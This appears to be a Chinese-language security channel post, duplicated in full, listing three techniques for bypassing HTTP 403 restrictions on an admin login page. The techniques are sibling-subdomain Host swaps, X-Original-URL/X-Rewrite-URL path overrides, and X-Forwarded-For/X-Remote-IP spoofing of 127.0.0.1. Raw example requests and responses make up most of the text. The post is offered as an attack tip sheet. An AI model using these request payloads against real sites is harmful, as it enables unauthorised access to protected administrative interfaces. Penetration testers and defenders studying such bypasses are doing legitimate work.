403 BYPASS 小记
方法一：旁站，有可能是管理员仅设置了主域的权限，那么通过改变旁站，可以越过权限设置
# 原始请求
GET /admin/login HTTP/1.1
Host: www.abc.com
# 原始响应
HTTP/1.1 403 Forbidden

# 改变请求
GET /admin/login HTTP/1.1
Host: $xxx$.abc.com
# 改编后响应
HTTP/1.1 200 OK

方法二：通过URL覆盖的方式，将GET后的URL改为根目录/，其后添加
如：X-Original-URL: /admin/login、X-Rewrite-URL: /admin/login 等
甚至：Referer: https://www.abc.com/admin/login

# 原始请求
GET /admin/login HTTP/1.1
Host: www.abc.com
# 原始响应
HTTP/1.1 403 Forbidden

# 改变请求
GET / HTTP/1.1
X-Original-URL: /admin/login
Host: www.abc.com
# 改编后响应
HTTP/1.1 200 OK

方法三：改变代理服务器，因为现在当下服务基本都是有CDN区做代理，利用如下X打头的非http标准协议改变其代理，诱骗认为访问在本地：
X-Originating-IP: 127.0.0.1、X-Remote-IP: 127.0.0.1、X-Forwarded-For: 127.0.0.1 等

# 原始请求
GET /admin/login HTTP/1.1
Host: www.abc.com
# 原始响应
HTTP/1.1 403 Forbidden

# 改变请求
GET /admin/login HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: www.abc.com
# 改编后响应
HTTP/1.1 200 OK

信息安全狂热者

403 BYPASS 小记
方法一：旁站，有可能是管理员仅设置了主域的权限，那么通过改变旁站，可以越过权限设置
# 原始请求
GET /admin/login HTTP/1.1
Host: www.abc.com
# 原始响应
HTTP/1.1 403 Forbidden

# 改变请求
GET /admin/login HTTP/1.1
Host: $xxx$.abc.com
# 改编后响应
HTTP/1.1 200 OK

方法二：通过URL覆盖的方式，将GET后的URL改为根目录/，其后添加
如：X-Original-URL: /admin/login、X-Rewrite-URL: /admin/login 等
甚至：Referer: https://www.abc.com/admin/login

# 原始请求
GET /admin/login HTTP/1.1
Host: www.abc.com
# 原始响应
HTTP/1.1 403 Forbidden

# 改变请求
GET / HTTP/1.1
X-Original-URL: /admin/login
Host: www.abc.com
# 改编后响应
HTTP/1.1 200 OK

方法三：改变代理服务器，因为现在当下服务基本都是有CDN区做代理，利用如下X打头的非http标准协议改变其代理，诱骗认为访问在本地：
X-Originating-IP: 127.0.0.1、X-Remote-IP: 127.0.0.1、X-Forwarded-For: 127.0.0.1 等

# 原始请求
GET /admin/login HTTP/1.1
Host: www.abc.com
# 原始响应
HTTP/1.1 403 Forbidden

# 改变请求
GET /admin/login HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: www.abc.com
# 改编后响应
HTTP/1.1 200 OK

hottg.com/Safecraze/47

5.9K viewsMar 10, 2022 at 12:01